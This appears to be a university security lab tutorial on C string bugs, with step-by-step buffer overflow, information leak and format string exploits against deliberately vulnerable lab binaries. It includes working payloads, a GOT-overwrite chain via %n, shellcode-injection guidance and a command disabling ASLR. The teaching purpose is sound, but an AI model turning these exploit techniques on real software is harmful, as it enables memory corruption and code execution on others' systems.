We will use this lab archive throughout the lab.
Please download the lab archive and then unpack it using the commands below:
student@mjolnir:~$ wget http://elf.cs.pub.ro/oss/res/labs/lab-07.tar.gz
student@mjolnir:~$ tar xzf lab-07.tar.gz
After unpacking we will get the lab-07/ folder that we will use for the lab:
student@mjolnir:~$ cd lab-07/
student@mjolnir:~/lab-07$ ls
basic-format-string basic-info-leak format-string info-leak printf-features string-shellcode
This is a tutorial-based lab. Throughout this lab you will learn about frequent errors that occur when handling strings. This tutorial is focused on the C language. Generally, OOP languages (like Java, C#, C++) use classes to represent strings; this simplifies the way strings are handled and decreases the frequency of programming errors.
Conceptually, a string is a sequence of characters. A string can be represented in multiple ways. One of the ways is to represent a string as a contiguous memory buffer, with each character encoded in some way. For example, the ASCII encoding uses 7-bit integers to encode each character; because it is more convenient to store 8 bits at a time in a byte, an ASCII character is stored in one byte.
The type for representing an ASCII character in C is char and it uses one byte. As a side note, sizeof(char) == 1 is the only guarantee that the C standard gives.
Another encoding that can be used is Unicode (with UTF-8, UTF-16, UTF-32 etc. as mappings). The idea is that in order to represent a Unicode string, more than one byte may be needed for one character. char16_t and char32_t were introduced in the C standard (C11) to represent these strings. The C language also has another type, called wchar_t, which is implementation defined and should not be used to represent Unicode characters.
Our tutorial will focus on ASCII strings, where each character is represented in one byte. We will show a few examples of what happens when one calls string manipulation functions that are assuming a specific encoding of the string.
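To make the difference between encodings concrete, here is a small sketch (Python 3, not part of the lab archive) that counts how many bytes one character needs under each mapping. The helper name encoded_sizes is made up for this illustration.

```python
def encoded_sizes(ch):
    """Return the number of bytes used to store `ch` in each encoding."""
    return {
        "utf-8": len(ch.encode("utf-8")),
        "utf-16": len(ch.encode("utf-16-le")),  # -le: no byte order mark
        "utf-32": len(ch.encode("utf-32-le")),
    }

# "A" is plain ASCII; U+00E9 and U+20AC are outside the ASCII range.
for ch in ("A", "\u00e9", "\u20ac"):
    print(repr(ch), encoded_sizes(ch))
```

Only the ASCII character fits in a single byte in UTF-8, which is why byte-oriented functions cannot be assumed to count characters for other encodings.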
man ascii
In C, the length of an ASCII string is given by its contents. An ASCII string ends with a 0 value byte called the NUL byte. Every str* function (i.e. a function with the name starting with str, such as strcpy, strcat, strdup, strstr etc.) uses this 0 byte to detect where the string ends. As a result, not ending strings in 0 and using str* functions leads to vulnerabilities.
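The effect of a missing NUL byte can be sketched by emulating what a str* function does: scan memory until a 0 byte is found. This is an illustrative Python 3 model, not the C library code; c_strlen and the memory contents are made up for the example.

```python
def c_strlen(memory, start=0):
    """Count bytes from `start` up to (not including) the first 0 byte."""
    length = 0
    while memory[start + length] != 0:
        length += 1
    return length

# Hypothetical memory: an 8-byte buffer followed by unrelated data.
terminated = bytearray(b"hello\x00\x00\x00" + b"SECRET\x00")
unterminated = bytearray(b"AAAAAAAA" + b"SECRET\x00")

print(c_strlen(terminated))    # stops inside the 8-byte buffer
print(c_strlen(unterminated))  # runs past the buffer into the next bytes
```

In the second case the scan only stops at the NUL byte that happens to follow the neighbouring data, so everything in between is treated as part of the string.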
Enter the basic-info-leak/ subfolder in the lab archive. It's a basic information leak example.
In basic_info_leak.c, buf is supplied as input, hence it is not trusted. We should be careful with this buffer. If the user gives 32 bytes as input then strcpy will copy bytes into my_string until it finds a NUL byte (0x00). Because the stack grows down on most platforms, we will start accessing the content of the stack. After the buf variable the stack stores the old ebp, the function return address and then the function parameters. This information is copied into my_string. As such, printing the information in my_string (after byte index 32) using puts() results in information leaks.
We can test this using:
$ python -c 'print "A"*32' | ./basic_info_leak
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX�����
In order to check the hexadecimal values of the leak, we pipe the output through xxd:
$ python -c 'print "A"*32' | ./basic_info_leak | xxd
00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000020: 786d 99ff f184 0408 0a
We have leaked two values above:
- the ebp value (right after the buffer): 0xff996d78 (it's a little endian architecture); it will differ on your system
- the my_main() return address: 0x080484f1
The return address usually doesn't change (except for executables with PIE, Position Independent Executable support). But assuming ASLR is enabled, the ebp value changes at each run. If we leak it we have a base address that we can toy around with to leak or overwrite other values. We'll see more of that in the Information Leak task.
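The two leaked values can be decoded from the raw bytes in the xxd dump with a few lines of Python 3. This is only a sketch of the conversion; the byte string is copied from the dump above and will differ on your system.

```python
import struct

# Bytes that follow the 32 "A" characters in the xxd dump above
# (the trailing 0a is the newline added by puts()).
leak = bytes.fromhex("786d99ff" "f1840408")

# "<II": two little-endian unsigned 32-bit integers.
saved_ebp, ret_addr = struct.unpack("<II", leak)
print(hex(saved_ebp), hex(ret_addr))
```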
For starters, let's do a recap on creating a shellcode-based attack and exploiting a string-based vulnerability.
In the string-shellcode/ subfolder in the lab archive you have a vulnerable executable dubbed string_shellcode. The original source code is string_shellcode.c. There is an obvious vulnerability when using strcpy() that will lead to an overflow and a rewrite of the get_num_alpha() function return address when called with a large enough number of characters in g_buffer.
Fill the TODO spots in the exploit.py script to inject and execute a shell.
- The shellcode will be stored at the beginning of the g_buffer global variable, which has a constant address. You can determine it using:
nm string_shellcode | grep ' g_buffer'
- Use pattc and patto to determine the offset between l_buffer and the get_num_alpha() function return address.
In GDB/PEDA, in order to send a given string (such as the pattern output by pattc) to the program standard input, use the process substitution construct:
gdb-peda$ r < <(echo 'AAAA.....')
- Build the payload as usual: add the shellcode, add padding and overwrite the get_num_alpha() function return address with the address of the shellcode (i.e. the address of the g_buffer global variable).
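The payload layout described above can be sketched as follows. This is a minimal Python 3 illustration that assumes a 32-bit little-endian target; build_payload is a hypothetical helper, and the offset, address and shellcode bytes are placeholders, not values from the lab binary.

```python
import struct

def build_payload(shellcode, offset, ret_addr):
    """Shellcode first, filler up to `offset`, then the new return address."""
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit before the return address")
    payload = shellcode + b"A" * (offset - len(shellcode))
    payload += struct.pack("<I", ret_addr)  # 32-bit little endian (assumed)
    if b"\x00" in payload:
        # strcpy() stops at the first NUL byte, truncating the payload.
        raise ValueError("payload contains a NUL byte")
    return payload

# Placeholder values, NOT taken from the lab binary.
example = build_payload(b"\x90" * 8, offset=40, ret_addr=0x0804A0C0)
print(len(example), example[-4:])
```

The real offset comes from pattc/patto and the real address from nm, as described in the steps above.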
We will now show how improper string handling will lead to information leaks from memory. For this, please access the info-leak/ subfolder in the lab archive. Please browse the info-leak.c source code file. The executable file is already generated in info-leak (a 32-bit ELF file).
The snippet below is the relevant code. The goal is to call the my_evil_func() function. One of the building blocks of exploiting a vulnerability is to see whether or not we have memory write. If you have memory writes, then getting code execution is a matter of getting things right. In this task we are assuming that we have memory write (i.e. we can write any value at any address). You can call the my_evil_func() function by overwriting the return address of the my_main() function:
#define NAME_SZ 32

static void read_name(char *name)
{
    memset(name, 0, NAME_SZ);
    read(0, name, NAME_SZ);
    //name[NAME_SZ-1] = 0;
}

static void my_main(void)
{
    char name[NAME_SZ];

    read_name(name);
    printf("hello %s, what address to modify and with what value?\n", name);
    fflush(stdout);
    my_memory_write();
    printf("Returning from main!\n");
}
What catches our eye is that the read() function call in the read_name() function reads up to 32 bytes. If we provide it exactly 32 bytes, the name won't be null-terminated, which will result in an information leak when printf() is called in the my_main() function.
Let's first try to see how the program works:
$ python -c 'import sys; sys.stdout.write(10*"A")' | ./info_leak
hello AAAAAAAAAA, what address to modify and with what value?
The binary wants an input from the user using the read() library call as we can see below:
$ python -c 'import sys; sys.stdout.write(10*"A")' | strace -e read ./info_leak
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\203\1\0004\0\0\0"..., 512) = 512
read(0, "AAAAAAAAAA", 32) = 10
hello AAAAAAAAAA, what address to modify and with what value?
read(0, "", 4) = 0
+++ exited with 255 +++
The input is read using the read() system call. The first read expects 32 bytes. You can see already that there's another read() call. That one is the first read() call in the my_memory_write() function.
As noted above, if we use exactly 32 bytes for name we will end up with a non-null-terminated string, leading to an information leak. Let's see how that goes:
$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak
hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�)���, what address to modify and with what value?
$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd
00000000: 6865 6c6c 6f20 4141 4141 4141 4141 4141 hello AAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh
00000030: 6174 2061 6464 7265 7373 2074 6f20 6d6f at address to mo
00000040: 6469 6679 2061 6e64 2077 6974 6820 7768 dify and with wh
00000050: 6174 2076 616c 7565 3f0a at value?.
We see we have an information leak. We leak one piece of data above: 0x7fffffffdcf0. It looks like a stack address. The leak stops after six bytes because the two most significant bytes of the 64-bit value are zero, and printf() treats the first zero byte as the end of the string.
If we run multiple times we can see that the leaked value differs between runs:
$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd | grep ','
00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh
The variable part is related to a stack address (it starts with 0x7f); it varies because ASLR is enabled. We want to look more carefully using GDB and figure out what the variable value represents:
$ gdb -q ./info_leak
Reading symbols from ./info_leak...done.
gdb-peda$ b printf
Breakpoint 1 at 0x400560
gdb-peda$ r < <(python -c 'import sys; sys.stdout.write(32*"A")')
Starting program: info_leak < <(python -c 'import sys; sys.stdout.write(32*"A")')
[...]
gdb-peda$ x/12g name
0x7fffffffdc20: 0x4141414141414141 0x4141414141414141
0x7fffffffdc30: 0x4141414141414141 0x4141414141414141
0x7fffffffdc40: 0x00007fffffffdc50 0x00000000004007aa
gdb-peda$ x/2i 0x004007aa
0x4007aa <main+9>: mov edi,0x4008bc
0x4007af <main+14>: call 0x400550 <puts@plt>
gdb-peda$ pdis main
Dump of assembler code for function main:
0x00000000004007a1 <+0>: push rbp
0x00000000004007a2 <+1>: mov rbp,rsp
0x00000000004007a5 <+4>: call 0x400756 <my_main>
0x00000000004007aa <+9>: mov edi,0x4008bc
0x00000000004007af <+14>: call 0x400550 <puts@plt>
0x00000000004007b4 <+19>: mov eax,0x0
0x00000000004007b9 <+24>: pop rbp
0x00000000004007ba <+25>: ret
End of assembler dump.
gdb-peda$
From the GDB session above, we determine that, after our buffer, there are two values: one value is the stored rbp (i.e. old rbp) and one value is the return address of the my_main() function (that gets it back to main()).
When we leak the data after the buffer we are able to retrieve the stored rbp value. In the above run the value of the stored rbp is 0x00007fffffffdc50. We also see that the stored rbp value is stored at address 0x7fffffffdc40, which is the value of the current rbp. We have the situation in the below diagram:
We marked the stored rbp value (i.e. the frame pointer for main(): 0x7fffffffdc50) with the font color red in both places.
In short, if we leak the value of the stored rbp (i.e. the frame pointer for main(): 0x00007fffffffdc50) we can determine the address the current rbp points to (i.e. the frame pointer for my_main(): 0x7fffffffdc40) by subtracting 16. The address where the my_main() return address is stored (0x7fffffffdc48) is computed by subtracting 8 from the leaked rbp value. By overwriting the value at this address we will force an arbitrary code execution and call my_evil_func().
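The address arithmetic above can be written down as a short Python 3 sketch. The function name frame_addresses is made up for this illustration, and the offsets 16 and 8 are the ones observed in the GDB session above; they are an assumption about this particular binary's stack layout.

```python
import struct

def frame_addresses(leaked):
    """Derive my_main()'s frame addresses from the leaked stored rbp bytes."""
    # printf("%s") stops at the first NUL byte, so only the non-zero low
    # bytes are leaked; pad back to 8 bytes before unpacking.
    stored_rbp = struct.unpack("<Q", leaked.ljust(8, b"\x00"))[0]
    current_rbp = stored_rbp - 16   # where the stored rbp itself lives
    ret_addr_slot = stored_rbp - 8  # where my_main()'s return address lives
    return stored_rbp, current_rbp, ret_addr_slot

# Value from the GDB session above, as it would appear in the leak.
leak = bytes.fromhex("50dcffffff7f")
print([hex(v) for v in frame_addresses(leak)])
```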
In order to overwrite the return address of the my_main() function with the address of the my_evil_func() function, make use of the conveniently (but not realistically) placed my_memory_write() function. The my_memory_write() function allows the user to write arbitrary values to arbitrary memory addresses.
Considering all of this, update the TODO lines of the exploit.py script to make it call the my_evil_func() function.
- Use nm to determine the address of the my_evil_func() function.
- Compute the old ebp leak and then the address of the my_main() return address.
- Use the unpack() function.
- The process should exit with the 42 error code set in the my_evil_func() function, same as below:
$ python exploit.py
[!] Could not find executable 'info_leak' in $PATH, using './info_leak' instead
[+] Starting local process './info_leak': pid 6422
[*] old_ebp is 0x7fffffffdd40
[*] return address is located at is 0x7fffffffdd38
[*] Process './info_leak' stopped with exit code 42 (pid 6422)
We will now see how (im)proper use of printf may provide us with ways of extracting information or doing actual attacks.
Calling printf, or some other string function that takes a format string as a parameter, directly with a string supplied by the user leads to a vulnerability called a format string attack.
The definition of printf:
int printf(const char *format, ...);
Let's recap some useful formats:
%x and %n are enough to have memory read and write and hence, to successfully exploit a vulnerable program that calls printf (or other format string function) directly with a string controlled by the user.
printf(my_string);
The above snippet is a good example of why ignoring compile time warnings is dangerous. The given example is easily detected by a static checker.
Try to think about:
- printf (variable number of arguments)
- where printf stores its arguments (hint: on the stack)
- what happens when my_string is "%x"
We would like to check some of the well-known and not so well-known features of the printf function. Some of them may be used for information leaking and for attacks such as format string attacks.
Go into the printf-features/ subfolder and browse the printf-features.c file. Compile the executable file using:
make
and then run the resulting executable file using
./printf-features
Go through the printf-features.c file again and check how print, length and conversion specifiers are used by printf. We will make use of the %n feature that allows memory writes, a requirement for attacks.
You will now do a basic format string attack using the basic-format-string/ subfolder in the lab archive. The source code is in basic_format_string.c and the executable is in basic_format_string.
You need to use %n to overwrite the value of the v variable to 200. You have to do three steps:
- Determine the address of the v variable using nm.
- Determine the n-th parameter of printf() that you can write to using %n. The buffer variable will have to be that parameter; you will store the address of the v variable in the buffer variable.
- The number of characters processed by printf() until %n is matched will have to be 200.
For the second step let's run the program multiple times and figure out where the buffer address starts. We fill buffer with the AAAAAAAA string and we expect to discover it using the printf() format specifiers.
$ ./basic_format_string
AAAAAAAA
%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx
7fffffffdcc07fffffffdcc01f6022897ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25
$ ./basic_format_string
AAAAAAAA
%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx
x7fffffffdcc07fffffffdcc0116022917ffff7dd18d06c6c25786c6c25786c6c25786c6c25786c6c25786c6c25787fffffffdcc07fffffffdcc01f6022917ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a
$ ./basic_format_string
AAAAAAAA
%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx
7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a4141414141414141
In the last run we get the 4141414141414141 representation of AAAAAAAA. That means that, if we replace the final %llx with %n, we will write at the address 0x4141414141414141 the number of characters processed so far:
$ echo -n '7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a' | wc -c
162
We need that number to be 200. You can fine tune the format string by using a construct such as %32llx to print a number on 32 characters instead of a maximum of 16 characters. See how much extra room you need and see if you reach 200 bytes.
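The fine tuning boils down to simple arithmetic, sketched below in Python 3. The helper width_for_target is hypothetical; the numbers 162 and 12 come from the last run above (12 is the length of the first printed value, 7fffffffdcc0). Keep in mind that editing the format string also changes the bytes dumped from the buffer, so the count should be measured again after each change.

```python
def width_for_target(printed_so_far, natural_len, target):
    """Field width that makes the total output reach `target` characters.

    printed_so_far: characters output before %n with the current format
    natural_len:    characters the chosen conversion prints without a width
    """
    extra = target - printed_so_far
    if extra < 0:
        raise ValueError("already printed more than the target")
    return natural_len + extra

# 162 characters were counted above; the first value (7fffffffdcc0) has 12.
print(width_for_target(162, 12, 200))
```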
8 for length. You may use %32llx, %33llx or %42llx. The numeric argument states the length of the print output.
After the plan is complete, write down the attack by filling the TODO lines in the exploit.py solution skeleton.
After you write 200 in v, you should obtain a shell:
$ python exploit64.py
[!] Could not find executable 'basic_format_string' in $PATH, using './basic_format_string' instead
[+] Starting local process './basic_format_string': pid 20785
[*] Switching to interactive mode
7fffffffdcc0 7fffffffdcc01f60229b7ffff7dd18d03125786c6c393425786c6c25786c6c34786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25a6e25
$
The goal of this task is to call my_evil_func again. This task is also tutorial based.
int main(int argc, char *argv[])
{
    printf(argv[1]);
    printf("\nThis is the most useless and insecure program!\n");
    return 0;
}
Any string that represents a useful format (e.g. %d, %x etc.) can be used to discover the vulnerability.
$ ./format "%08x %08x %08x %08x"
00000000 f759d4d3 00000002 ffd59bd4
This is the most useless and insecure program!
The values starting with 0xf are very likely pointers. Again, we can use this vulnerability as an information leak. But we want more.
Another useful format for us is %m$ followed by any normal format selector, which means that the m-th parameter is used as an input for the following format. %10$08x will print the 10th parameter with %08x. This allows us to do a precise access of the stack.
Example:
$ ./format "%08x %08x %08x %08x %1\$08x %2\$08x %3\$08x %4\$08x"
00000000 f760d4d3 00000002 ff9aca24 00000000 f760d4d3 00000002 ff9aca24
This is the most useless and insecure program!
Note the equivalence between formats.
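When probing many stack positions it can be handy to generate the positional format string instead of typing it. A small Python 3 sketch follows; positional_probe is a made-up helper name.

```python
def positional_probe(first, last, conv="08x"):
    """Build a format string reading arguments first..last by position."""
    return " ".join("%{}${}".format(m, conv) for m in range(first, last + 1))

print(positional_probe(1, 4))
```

When pasting the result inside double quotes on the shell command line, each $ still has to be escaped as \$, as in the example above.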
Now, because we are able to select any higher address with this function and because the buffer is on the stack, sooner or later we will discover our own buffer.
$ ./format "$(perl -e 'printf "%%08x\x0a"x10000')"
Depending on your setup you should be able to view the hex representation of the string "%08x\n".
Why do we need our own buffer? Remember the %n
format? It can be used to write at an address given as parameter. The idea is to give this address as parameter and achieve memory writing. We will see later how to control the value.
The next steps are done with ASLR disabled. In order to disable ASLR, please run
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
By trial and error or by using GDB (breakpoint on printf) we can determine where the buffer starts:
$ ./format "$(perl -e 'printf "A"x512 . "%%08x \x0a"x200')" | grep -n 41 | head
17:415729ac
56:ffffdd41
128:41007461
129:41414141
130:41414141
#!/usr/bin/env perl
use strict;
use warnings;
use v5.20;

my $stack_items = 1000;
printf "A" x 512;
printf "%%08x \x0a" x $stack_items;
Then call the format program using (note the enclosing double-quotes):
$ ./format "$(perl exploit.pl)"
One idea is to keep things in multiples of 4, as done for "%08x \x0a". If you look at line 128, one of our As is there. Because the machine is little endian, the 0x41 appears as the most significant byte. We want to fix this, to have our buffer aligned. Note that you can add as many format specifiers as you want; the start of the buffer will be the same (more or less).
We can compress our buffer by specifying the position of the argument.
$ ./format "$(perl -e 'printf "BCDE"."A"x510 . "%%126\$08x"')" BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45444342 This is the most useless and insecure program!
You can see that the last piece of output is our “BCDE” string printed with %08x; this means that we know where our buffer is.
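The relation between the four input bytes and the printed value can be checked with a short Python 3 snippet. It is just an illustration of little-endian decoding, not part of the exploit.

```python
import struct

# "<I": one little-endian unsigned 32-bit integer.
value = struct.unpack("<I", b"BCDE")[0]
print("%08x" % value)
```

The first byte of the buffer ("B", 0x42) ends up as the least significant byte of the printed word.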
$ ulimit -c unlimited
mov %edx,(%eax)
or the equivalent in Intel syntax
mov DWORD PTR [eax], edx
It may be different on your system, for example edx may be replaced by esi, such as
mov DWORD PTR [eax], esi
Update the explanations below accordingly.
rm -f core
We can replace %08x with %n; this should lead to a segmentation fault.
$ ./format "$(perl -e 'printf "BCDE"."A"x510 . "%%126\$08n"')"
Segmentation fault (core dumped)
$ gdb ./format -c core
...
Core was generated by `./format BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6
(gdb) bt
#0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6
#1 0xf7e5deff in printf () from /lib/i386-linux-gnu/libc.so.6
#2 0x08048468 in main (argc=2, argv=0xffffd2f4) at format.c:18
(gdb) x/i $eip
=> 0xf7e580a2 <vfprintf+17906>: mov %edx,(%eax)
(gdb) info registers $edx $eax
edx 0x202 514
eax 0x45444342 1162101570
(gdb) quit
Bingo. We have memory write. The vulnerable code tried to write the value 514 at the address 0x45444342 (“BCDE” little endian). The value 514 is the amount of data written so far by printf (510 As and “BCDE”).
Right now, our input string has 522 bytes (the 514 bytes above plus the 8 bytes of the %126$08n specifier). But we can further compress it, thus making the value that we write independent of the length of the input.
$ ./format "$(perl -e 'printf "BCDE". "A"x506 . "%%99x" . "%%126\$08n"')"
Segmentation fault (core dumped)
$ gdb ./format -c core
(gdb) info registers $edx $eax
edx 0x261 609
eax 0x45444342 1162101570
(gdb) quit
Here we managed to write 609 (4+506+99). Note that we should keep the number of bytes before the format string the same. This means that if we want to print with a padding of 100 (three digits) we should remove one A. You can try this by yourself.
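The values seen in edx in the two runs above follow directly from counting output characters. A minimal Python 3 sketch of that count is shown below; value_written is a hypothetical helper, and it assumes each padded conversion prints exactly its field width (true as long as the value has no more digits than the width).

```python
def value_written(literal_len, pad_widths):
    """Characters output before %n: literal bytes plus padded conversions."""
    return literal_len + sum(pad_widths)

print(value_written(4 + 510, []))    # "BCDE" + 510 "A"s
print(value_written(4 + 506, [99]))  # "BCDE" + 506 "A"s + %99x
```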
How far can we go? Probably we can use any integer for specifying the number of bytes which are used for a format, but we don't need this; moreover, specifying a very large padding is not always feasible (think what happens when printing with snprintf). 255 should be enough.
Remember, we want to write a value to a certain address. So far we control the address, but the value is somewhat limited. If we want to write a full 4-byte value we can make use of the endianness of the machine: each %n stores a number whose least significant byte lands at the target address. The idea is to write at the address n and then at the address n+1 and so on.
Let's first display the address. We are using the address 0x804a008. This address is the address of the GOT entry for the puts function. Basically, we will overwrite the GOT entry for puts.
$ objdump -R ./format | grep puts
0804a008 R_386_JUMP_SLOT puts
$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%255x|" . "%%126\$08x" . "%%255x|" . "%%127\$08x" . "%%255x|" . "%%128\$08x"')"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... 0|0804a008 f7e2a4d3|0804a009 2|0804a00a ffffd2c4|0804a00b
This is the most useless and insecure program!
Why are we printing 498 As? We added 12 bytes before our format and 6 extra bytes for the output; the | is there only for pretty print. We want to keep the first argument in place; in any case, you should always check this.
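The four escaped addresses at the start of the input are just consecutive addresses packed as 32-bit little-endian values. A Python 3 sketch of how they could be generated is shown below; address_prefix is a made-up helper, and 0x0804a008 is the puts GOT entry reported by objdump above (it may differ on your system).

```python
import struct

def address_prefix(base, count=4):
    """Pack `count` consecutive addresses as 32-bit little-endian values."""
    return b"".join(struct.pack("<I", base + i) for i in range(count))

prefix = address_prefix(0x0804A008)
print(prefix)
```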
Let's replace the %x with %n:
$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%255x|" . "%%126\$08n" . "%%255x|" . "%%127\$08n" . "%%255x|" . "%%128\$08n" . "%%255x|" . "%%129\$08n"')"
$ gdb ./format -c core
Program terminated with signal 11, Segmentation fault.
#0 0x02020202 in ?? ()
(gdb) x/x 0x0804a000
0x804a000 <printf@got.plt>: 0xf7e5ded0
(gdb) x/x 0x0804a004
0x804a004 <fwrite@got.plt>: 0x08048396
(gdb) x/x 0x0804a008
0x804a008 <puts@got.plt>: 0x02020202
(gdb) x/x 0x0804a00c
0x804a00c <__gmon_start__@got.plt>: 0x08000006
(gdb)
In the gdb session above you can see:
How come we wrote the first 0x02?
Just before executing the first %n the vulnerable code printed 770 (4*4+498+256) bytes and hex(770) == 0x302.
How come the rest of the bytes are 0x02?
After executing the first %n we printed another 256 bytes before each %n, so we actually wrote 0x402, 0x502 and 0x602. You can see that the lowest three bytes of __gmon_start__@got.plt are 0x000006.
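The overlapping writes can be replayed on a small byte array to see why every byte of the puts entry ends up as 0x02. This Python 3 sketch models only the 8 bytes starting at the puts GOT entry and assumes they start out as zero; apply_writes is a hypothetical helper.

```python
import struct

def apply_writes(counts, size=8):
    """Write each count as a 32-bit little-endian value at offsets 0, 1, 2..."""
    memory = bytearray(size)  # assumed zero-filled for the illustration
    for offset, count in enumerate(counts):
        memory[offset:offset + 4] = struct.pack("<I", count)
    return memory

memory = apply_writes([0x302, 0x402, 0x502, 0x602])
print(memory.hex())
```

Each write overwrites the upper bytes left by the previous one, so only the low byte 0x02 of each count survives in the first four positions, while the last write spills 06 00 00 into the next entry.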
We want to put the value 0x08048494.
$ objdump -d ./format | grep my_evil
08048494 <my_evil_func>:
The first byte is 0x94 (little endian). Recall that we were able to write 0x02; writing 0x94 means replacing the first 255 with 255-(0x102-0x94) == 145.
$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%145x|" . "%%126\$08n" . "%%255x|" . "%%127\$08n" . "%%255x|" . "%%128\$08n" . "%%255x|" . "%%129\$08n"')"
$ gdb ./format -c core
#0 0x94949494 in ?? ()
(gdb) quit
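The next byte that we want to write is 0x84, so we need to replace the second 255 with 239 (the count after the first %n is 0x294, and 0x384-0x294 == 240 characters, one of which is the |). We can continue this idea until we profit.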
$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%145x|" . "%%126\$08n" . "%%239x|" . "%%127\$08n" . "%%127x|" . "%%128\$08n" . "%%259x|" . "%%129\$08n"')" | tr -s ' ' > /dev/null
I'm evil, but nobody calls me :-(
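The four padding values used in the final command can be derived mechanically. The Python 3 sketch below is one way to do it under the assumptions of this walkthrough: 16 address bytes plus 498 As are printed before the first %x, each %x is followed by one | character, and a width of at least 8 guarantees that %x prints exactly that many characters. The name pad_widths is made up for the illustration.

```python
def pad_widths(start_count, target, separator_len=1, min_width=8):
    """Field widths so successive %n writes store the bytes of `target`."""
    widths = []
    count = start_count
    for shift in (0, 8, 16, 24):           # least significant byte first
        byte = (target >> shift) & 0xFF
        width = (byte - count - separator_len) % 256
        while width < min_width:           # %x may print up to 8 hex digits
            width += 256
        widths.append(width)
        count += width + separator_len
    return widths

# 4 addresses (16 bytes) + 498 "A"s are printed before the first %x.
print(pad_widths(16 + 498, 0x08048494))
```

For a different target address or a different amount of leading output, only the two arguments change.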
[1p] Bonus task Can you get a shell? (Assume ASLR is disabled).
- Never use gets. With gets there is no way of limiting how much data is read.
- Use functions with an n parameter whenever a non-constant string is involved, e.g. snprintf, strncat.
- Make sure the NUL byte is added; for instance, strncpy does not add a NUL byte when the source is at least as long as the size limit.
- Use wcs* functions (e.g. wcscpy, wcslen) when dealing with wide char strings.